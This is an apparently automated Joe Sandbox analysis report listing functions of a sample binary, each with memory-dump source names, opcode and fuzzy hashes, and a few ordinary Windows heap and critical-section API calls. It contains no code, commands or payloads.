Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: Thread$Alert
String ID:
API String ID: 2775339012-0
Opcode ID: 268410888336d5f5de7d7d8c339726d3f53d38f4ad539c2cdebad6f8de29b9ee
Instruction ID: 4e5e65469b3a5cd61057490438300629ffdcb0621cda67965b6f1252fe0f22cc
Opcode Fuzzy Hash: 268410888336d5f5de7d7d8c339726d3f53d38f4ad539c2cdebad6f8de29b9ee
Instruction Fuzzy Hash: 02C08C35A02472969F1B0108A30099B2E325F81664315408C9C022B21082029C4345E1

Uniqueness

Uniqueness Score: -1.00%

Function 7264E650, Relevance: 1.5, APIs: 1, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: db0bd0335c9987a2431c23ef02da8ff0324d7db38db1331e09314996c855404a
Instruction ID: 1f9c2e50cabdfe1f54f327642858cf22cd235f7335332699415249e6826538b7
Opcode Fuzzy Hash: db0bd0335c9987a2431c23ef02da8ff0324d7db38db1331e09314996c855404a
Instruction Fuzzy Hash: A4C012392605818BCA06CE2CC2A0A843BF2B740A40F8504D0D841CBB11D218D802DA00

Uniqueness

Uniqueness Score: -1.00%

Function 72662073, Relevance: 1.5, APIs: 1, Instructions: 10memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.210A(?,00000000,?,?,72659426,?,00020019,?,?,000000FA,00000001,?,00000050,?,00000000), ref: 72662086

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: cba28d27f612a2cef92f659d3d4db5dcdeb617dba538c41cc7d9cf38f0674c24
Instruction ID: 09099bb24393591760405fce6108b1a11b5480a86a5271e8f827cf484faa8788
Opcode Fuzzy Hash: cba28d27f612a2cef92f659d3d4db5dcdeb617dba538c41cc7d9cf38f0674c24
Instruction Fuzzy Hash: 62C08C32080288BBC7225E45DD00F117F69E791B60F000021FA040A6A0C532E860D588

Uniqueness

Uniqueness Score: -1.00%

Function 7267116C, Relevance: 1.5, APIs: 1, Instructions: 10memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.210A(?,00000000,00000000,72670E17,?,00000000,?,?,0000003A,727379A0,?,00000000,72692500,7271F918,000000FE), ref: 72671180

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 64a0b972ec505b63083569f2a09dea789b4d507b5aba8e05f812eae5669d1a20
Instruction ID: 04cebce1780d44b31d3b2634b8b563e35a9c230b68ad42d986ae2515108cf558
Opcode Fuzzy Hash: 64a0b972ec505b63083569f2a09dea789b4d507b5aba8e05f812eae5669d1a20
Instruction Fuzzy Hash: A4C09BB1151480ABD7155F34DE51F257AB4F741B71F640795B121495F4D5689C00D544

Uniqueness

Uniqueness Score: -1.00%

Function 72656682, Relevance: 1.5, APIs: 1, Instructions: 10memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.210A(?,00000000,?,726A6371,727366C0,?,727384D8,?,?,7264DB97,?,00000010,00000000,72738638), ref: 72656698

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 3a71a3d065c37b54d690fbb719efa916b2c71834efe7088253001a476517126d
Instruction ID: b29c72ab9079c9f6bf34aafe98a6e468a049a5d7004df84e4ce516b7328be9cf
Opcode Fuzzy Hash: 3a71a3d065c37b54d690fbb719efa916b2c71834efe7088253001a476517126d
Instruction Fuzzy Hash: FFC08C701419845BEB0A4F09CE04B303AA2AB0470CFA001ADAE43094E2C368A802C709

Uniqueness

Uniqueness Score: -1.00%

Function 727181BF, Relevance: 1.5, APIs: 1, Instructions: 6threadCOMMON

Download Yara Rule

APIs

RtlIsCriticalSectionLockedByThread.210A(?,726B2A6D), ref: 727181CB

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: CriticalLockedSectionThread
String ID:
API String ID: 3632441385-0
Opcode ID: b6eb1c943fbaee3aad95b1c3f40647225e87d168e9458b96080fbddf545c3502
Instruction ID: 2a6f4c2222b653cf1e486fa36107b2b5e5eef3fc49c9ff49fa57a1cf7a57305c
Opcode Fuzzy Hash: b6eb1c943fbaee3aad95b1c3f40647225e87d168e9458b96080fbddf545c3502
Instruction Fuzzy Hash: A0B01231212580CFC7025725CB04B1837A9BF017D0F8900B0750085470D61C9810D502

Uniqueness

Uniqueness Score: -1.00%

Function 7267056B, Relevance: 1.5, APIs: 1, Instructions: 5COMMON

Download Yara Rule

APIs

RtlLeaveCriticalSection.210A(?,72670504,00000001,?,?,?,?,?,?,?,00000000,0000000E,00000000), ref: 72670574

Part of subcall function 7265DB60: RtlpNotOwnerCriticalSection.210A(?,?,?), ref: 7265DB97

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: CriticalSection$LeaveOwnerRtlp
String ID:
API String ID: 2715901738-0
Opcode ID: fa596dcda80bb93547197393294050020e6c9f07ee14e708a4c13f225b933123
Instruction ID: c542c24d0d742f581e8b9480544613089686a70ac668d868603409a08c85a38d
Opcode Fuzzy Hash: fa596dcda80bb93547197393294050020e6c9f07ee14e708a4c13f225b933123
Instruction Fuzzy Hash: 27B01232C10844CFCF02DF45C610B1D7732FB00B10F0540909110275E0C228AC01CB44

Uniqueness

Uniqueness Score: -1.00%

Function 004023E8, Relevance: 1.4, Strings: 1, Instructions: 197COMMON

Download Yara Rule

Strings

eje, xrefs: 0040246D

Memory Dump Source

Source File: 00000000.00000002.1330007715.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_y98WYYcJ2U.jbxd

Yara matches

Similarity

API ID:
String ID: eje
API String ID: 0-1763854897
Opcode ID: 244bb7561b0e5a450521a0ae4df031f88b79ad0fbed5d4507d30a517af73227e
Instruction ID: 794b747f00d90f1c007a1679f9663f75b70c8fcf0eb04182ee1c72f223f9bf84
Opcode Fuzzy Hash: 244bb7561b0e5a450521a0ae4df031f88b79ad0fbed5d4507d30a517af73227e
Instruction Fuzzy Hash: 5051C021108053EAEB21B6649F6C1ECB7A1BAE13793D84673C021771D6D5BD408BC3AE

Uniqueness

Uniqueness Score: -1.00%

Function 7266A7B6, Relevance: 1.3, Strings: 1, Instructions: 71COMMON

Download Yara Rule

Strings

Actx , xrefs: 7266A7DF

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID:
String ID: Actx
API String ID: 0-89312691
Opcode ID: b0656154b20d93510c5d47d99e7ada25e9d8d9b515a2b57b8fe5bcf6fb91e975
Instruction ID: c1c7478a4e6dfa1179beb336ccd41e93ae94b8380b19013f362b85d3555f4047
Opcode Fuzzy Hash: b0656154b20d93510c5d47d99e7ada25e9d8d9b515a2b57b8fe5bcf6fb91e975
Instruction Fuzzy Hash: 781160747056428BE72A8E1DC460736B6AAEBD5264F30452FE853CB3D5EA74DC42C7C0

Uniqueness

Uniqueness Score: -1.00%

Function 00402440, Relevance: 1.3, Strings: 1, Instructions: 56COMMON

Download Yara Rule

Strings

eje, xrefs: 0040246D

Memory Dump Source

Source File: 00000000.00000002.1330007715.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_y98WYYcJ2U.jbxd

Yara matches

Similarity

API ID:
String ID: eje
API String ID: 0-1763854897
Opcode ID: 6b4dccf068cccafc6bb60d07a2f71b943153a5950f8da0ed44cb62c3e026964f
Instruction ID: 598281175368f13ed159c9f365b8cf89c98122a96f73b03f304ce9ee65d1fac8
Opcode Fuzzy Hash: 6b4dccf068cccafc6bb60d07a2f71b943153a5950f8da0ed44cb62c3e026964f
Instruction Fuzzy Hash: 4601207250804393EF11EA709F081E8B370AAE23BD3A88A73C032751C5E6BAC449C69D

Uniqueness

Uniqueness Score: -1.00%

Function 727061DF, Relevance: .5, Instructions: 473COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 89a243b73c3964831f1165073691b32f8460ead4e0338263b6cc59107b7a3f37
Instruction ID: 5724f132c97159f3c2bd9c6ea4b476b5338456217acbb87155b7fc53e542a553
Opcode Fuzzy Hash: 89a243b73c3964831f1165073691b32f8460ead4e0338263b6cc59107b7a3f37
Instruction Fuzzy Hash: 8E0203743046518AD725CF2DC260376BBF2AF45304B44C59EE8E7CB28AD335E96ADB60

Uniqueness

Uniqueness Score: -1.00%

Function 7265A080, Relevance: .4, Instructions: 405COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e482baf2e65c12a5e52784dd215ae0d4a9e37cad06a9f19b1139bc40364497e9
Instruction ID: 3b5912d84d65d0596eabf5bb6f8c413e34624117d1e4d399a306222f0dd56047
Opcode Fuzzy Hash: e482baf2e65c12a5e52784dd215ae0d4a9e37cad06a9f19b1139bc40364497e9
Instruction Fuzzy Hash: 2AD1B0317146128BCB17CE6EC9D036ABBB2AF95318B28856BDC56CB2C5E732DC52C750

Uniqueness

Uniqueness Score: -1.00%

Function 7267E020, Relevance: .2, Instructions: 250COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 544ebef84ec945ee79df665d778d7246bd389ac6acb403b8d491e5b9d2635bde
Instruction ID: 5322c09abe854730937e7d5ada17c2502f1222327e1d44984b067ec4795c30f6
Opcode Fuzzy Hash: 544ebef84ec945ee79df665d778d7246bd389ac6acb403b8d491e5b9d2635bde
Instruction Fuzzy Hash: E3814975A042D68BEB1B4E6CD8C125DBB21EF56214F24427BD8838B3C5C239DC6AD791

Uniqueness

Uniqueness Score: -1.00%

Function 72676180, Relevance: .2, Instructions: 240COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4cfe5cad1af2a1c2888bfc45f99029cd1a393bdf47c6af9fac6ec97af03dabe6
Instruction ID: a63c006debe78013648aef5d33d331c1dd1845ea8f4e5839283dff3d59595d8a
Opcode Fuzzy Hash: 4cfe5cad1af2a1c2888bfc45f99029cd1a393bdf47c6af9fac6ec97af03dabe6
Instruction Fuzzy Hash: B981F431A002198FDB15CE5DD894BAEB7F1EF84324F25426ED8A2AB3C1D630ED15CB90

Uniqueness

Uniqueness Score: -1.00%

Function 726FF42B, Relevance: .2, Instructions: 214COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e2d4eb3f981f047f13cf2127bdd3b87a47e797dbfeba6e017e6dcc6f2ae18680
Instruction ID: e17e6f045c8b98419358d14ba4fc9ba0cc8579816179326de7b8406493d1cc47
Opcode Fuzzy Hash: e2d4eb3f981f047f13cf2127bdd3b87a47e797dbfeba6e017e6dcc6f2ae18680
Instruction Fuzzy Hash: 19817BB09002469FDF05DF69C491BAAFBF2FB09304F60815EE546AB2D5D7749882CF64

Uniqueness

Uniqueness Score: -1.00%

Function 00401600, Relevance: .2, Instructions: 207COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1330007715.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_y98WYYcJ2U.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ec9e680bc593b65526d5ef1e5daed2c813766944dc6e69819f8e47f4365e26e1
Instruction ID: 30c99ad66dd0c5a2c6aa689a1d7f11bbffe6a67047671dca069292d364ddcb3f
Opcode Fuzzy Hash: ec9e680bc593b65526d5ef1e5daed2c813766944dc6e69819f8e47f4365e26e1
Instruction Fuzzy Hash: A651F03A140122CACB12E6B4AC410EDB771EDD17257588A7BD0116F2F7DA2A90CBC7E5

Uniqueness

Uniqueness Score: -1.00%

Function 726EC53F, Relevance: .2, Instructions: 171COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0ac5a8900000a27b086adcd5eb458213e4735d07d4b25c19514c601d3c6d7cf0
Instruction ID: e232c7031dc01565261d2d98b85400fdcd47a2925e98e3c77c349a8ba8099c41
Opcode Fuzzy Hash: 0ac5a8900000a27b086adcd5eb458213e4735d07d4b25c19514c601d3c6d7cf0
Instruction Fuzzy Hash: 6D51AD70B016159BCB198F2DC980A6BBBB2FF89704F2085ABE4078B385D7719942CB94

Uniqueness

Uniqueness Score: -1.00%

Function 72676611, Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1b8cbe8827ad3be040179493fe76706d2268f93ed968a5a4247b6dd235bdbb8d
Instruction ID: 0cf8a0d00a7189eab4ce8e48c58ebb2c4fa0023433411727f0af514ace19988f
Opcode Fuzzy Hash: 1b8cbe8827ad3be040179493fe76706d2268f93ed968a5a4247b6dd235bdbb8d
Instruction Fuzzy Hash: 7C21D5302006069BCB198F2DD4846E2BBF6EF99308FA0411FD4D6877C1D721B806CF92

Uniqueness

Uniqueness Score: -1.00%

Function 7270B3D2, Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5fd1b6020b51eb50aa040a24b507748846ee0aeffe055e682f43407fafcf238b
Instruction ID: 0f02f512af0dc60ef6a2854208820dcbfae9f4fbef1cf8c2d2010e83f6372658
Opcode Fuzzy Hash: 5fd1b6020b51eb50aa040a24b507748846ee0aeffe055e682f43407fafcf238b
Instruction Fuzzy Hash: DE1183B1A106509FDB98CF2DD1C4655BBE8FF88310B1582AAEC18CB74AD374E961CF94

Uniqueness

Uniqueness Score: -1.00%

Function 7266E067, Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 747dc2ed44f91344166a6004f7500a103ac8a368237bf89efbc4c9373e9eaad7
Instruction ID: d8bf9bd6c5696d99a76f044f06208134eedb7069caae044d3d475027e619d2f9
Opcode Fuzzy Hash: 747dc2ed44f91344166a6004f7500a103ac8a368237bf89efbc4c9373e9eaad7
Instruction Fuzzy Hash: F7F0BE7D9656D89FE323872CC244F267BF9AB04724F2084A7DC17876C2C677D8A1C256

Uniqueness

Uniqueness Score: -1.00%

Function 7267A0A3, Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a074253702fe0dad24e426ad62565daf41972acd8458ed4fea666dc53ae3b70e
Instruction ID: a398739d54d804a99248d9d7ca772700477f208ccff1dd3c89b08728539ddeda
Opcode Fuzzy Hash: a074253702fe0dad24e426ad62565daf41972acd8458ed4fea666dc53ae3b70e
Instruction Fuzzy Hash: 0BF0E2725156D08ED312872CE604B0277E99B0876DF204867E80797781C730CC89D655

Uniqueness

Uniqueness Score: -1.00%

Function 7264356C, Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6aa88e2213e774345bce71db5bef579016f0692f2d6b99268b17789e58137cd3
Instruction ID: f2c1b6ebd927d0e6e9a9c737ad9526992841a83e17fb4f8a18f282b9454ec589
Opcode Fuzzy Hash: 6aa88e2213e774345bce71db5bef579016f0692f2d6b99268b17789e58137cd3
Instruction Fuzzy Hash: 9CF0EC32911680CFD322A73CC290B1277F9DB04B72F199063D80787682C6B0CC88C698

Uniqueness

Uniqueness Score: -1.00%

Function 7266C74A, Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d406416a9cc2f1ab6b5cf263ea26d38435da052761d776353f9ae8424bd98e77
Instruction ID: 88207269cfcea7d57bf5d3753dad89127b2fa55e4f3deb6946de40addd51a8d7
Opcode Fuzzy Hash: d406416a9cc2f1ab6b5cf263ea26d38435da052761d776353f9ae8424bd98e77
Instruction Fuzzy Hash: B3F0A7B5525684AFE312872CC644B1277FB9F407B0F2154A3D40687582C7B8D882C794

Uniqueness

Uniqueness Score: -1.00%

Function 72672616, Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 110656d3624854b1803b287ab1a4e3445a62d18cd6a5d10e7cf6584cfade3e65
Instruction ID: 5bf7eac93cc33a9012c1e34820ccdae68e5d8b860c9ccd6b96841cde9acb2f41
Opcode Fuzzy Hash: 110656d3624854b1803b287ab1a4e3445a62d18cd6a5d10e7cf6584cfade3e65
Instruction Fuzzy Hash: 23E026335102448BC3039619E592B0237FBF760748F30842BE845CF6C2D238EDA3C544

Uniqueness

Uniqueness Score: -1.00%

Function 726F8747, Relevance: .0, Instructions: 9COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e0308ce5ee14c24fb886fb9f14b489cdec504b92c80768c2a23305a5c2b521e7
Instruction ID: 1b72d07ece70bfbc29f40a868561e30738a45dace1b8109429d7a98afb437229
Opcode Fuzzy Hash: e0308ce5ee14c24fb886fb9f14b489cdec504b92c80768c2a23305a5c2b521e7
Instruction Fuzzy Hash: B0C0482E16A6C54ACE178B2883227D9BFA2DB429D0F1914C2D4D22F662C12856139A2A

Uniqueness

Uniqueness Score: -1.00%

Function 72648420, Relevance: .0, Instructions: 9COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: ExclusiveLock$AcquireAllocateControlEncodeEnforcedFlowGuardHeapPointerPolicyProtectedQueryRelease
String ID:
API String ID: 2945851633-0
Opcode ID: 4729b51c18a78c6ac79c72f4639e7623332df2c807a176b4538a05147704ec39
Instruction ID: d46f50c8540d64721794130b915713b90110228abffcbb214409a0bb1eebceef
